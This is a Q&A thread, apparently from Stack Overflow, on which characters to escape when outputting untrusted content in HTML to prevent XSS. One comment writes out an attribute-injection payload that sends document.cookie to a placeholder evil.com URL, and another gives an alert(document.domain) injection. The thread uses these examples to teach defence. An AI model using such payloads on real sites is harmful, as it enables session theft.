# Minimum requirements for escaping HTML output

Tags: security, html-escape-characters

What are the characters that are required and suffice when escaping user-generated content before output? (in other words: what are the characters web developers should escape when outputting text that previously came from an untrusted, anonymous source?)

Comment: It seems that different people understood the question in different ways. Let me clarify: I am asking this for security reasons.

Answer (score 6, accepted):

When echoing to a page, you should encode

> - '&' (ampersand) becomes '`&amp;`'
> - '"' (double quote) becomes '`&quot;`'
> - ''' (single quote) becomes '`&#039;`'
> - '<' (less than) becomes '`&lt;`'
> - '>' (greater than) becomes '`&gt;`'

From PHP's `htmlspecialchars()` [docs](http://php.net/manual/en/function.htmlspecialchars.php).

Note that the [context](https://stackoverflow.com/questions/2113984/is-replacing-and-with-lt-and-gt-enough-to-prevent-xss-injection/2113996#2113996) also matters.

You'll also need to take the character set into account.

Comment: What's the reason and/or need to escape quotes?

Comment: In case the text goes into an <input> tag, where it's placed in the value attribute, enclosed in quotes.

Comment: @ChrisW I echo your name here `<input name="name" value="<?php echo $name; ?>">`. Now what if I entered my name as `alex" onfocus="window.location = 'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)`

Comment: I also recommend escape anything that is not [a-zA-Z0-9]. Browsers will be able to represent properly and is not going to take you too much effort to implement it.

Comment: @Pedro Laguna - If you mean for accented letters, etc., why not serve it as UTF?

Comment: @ChrisW no, I mean : ; , . / \ + = _ - # ! etc. You never know what the bad guys are going to discover to execute Javascript ;)

Comment: @Pedro You mean you never know how IE can be tricked into executing JavaScript... I mean have you seen how the Samy worm was made? http://namb.la/popular/tech.html

Comment: This answer is not what I wanted nor what I expected, but it is the most insightful one because it made me realize that the question is incomplete. Thank you, @alex

Comment: @alex yes, I read (and understand) the Samy code and the java\nsript trick. But other tricks can be discovered in other browsers too: http://sla.ckers.org/forum/read.php?24,33938,page=1

Comment: @Pedo I know, I was just having a joke at IE's expense :D

Comment: There are more characters, it all depends on where in the page input is displayed. For example if it is displayed inside JavaScript tags (<script></script>) or in CSS you have to worry about other characters.  Check this link (Why Can't I Just HTML Entity Encode Untrusted Data?): http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Comment: @Pedro Wow, tested a few of them in my console and they are working with Firefox 3.6.3. Scary stuff... thanks for the link.

Comment: @Pedro, I understand you want to be cautious, but escaping everything outside [a-zA-Z0-9] is going to leave some languages (Japanese, Arabic etc) with ALL characters escaped.... That's insane imho. There are 100.000 Unicode code points. You would escape ALL of them except for 62 of them?? Instead I think you could escape maybe some special characters like slash if you are worried. But to escape all characters in all non-western scripts seems overkill. Much.

Answer (score 0):

I think that escaping the `< > & " '` symbols should be enough for any scenario.

Comment: These characters are not enough in some scenarios. Imagine the following code: <input type="text" value="asdf\" onclick=alert(document.domain); a=\""> Simply scape the double quotes does not helps you :)

Comment: oh, yes, of course, I forgot the backslash. That's about it then :).

Comment: @PedroLaguna you almost got me there: if you escape the double-quotes, your example will render <input type="text" value="asdf\&quot; onclick=alert(document.domain); a=\&quot;"> which is harmless.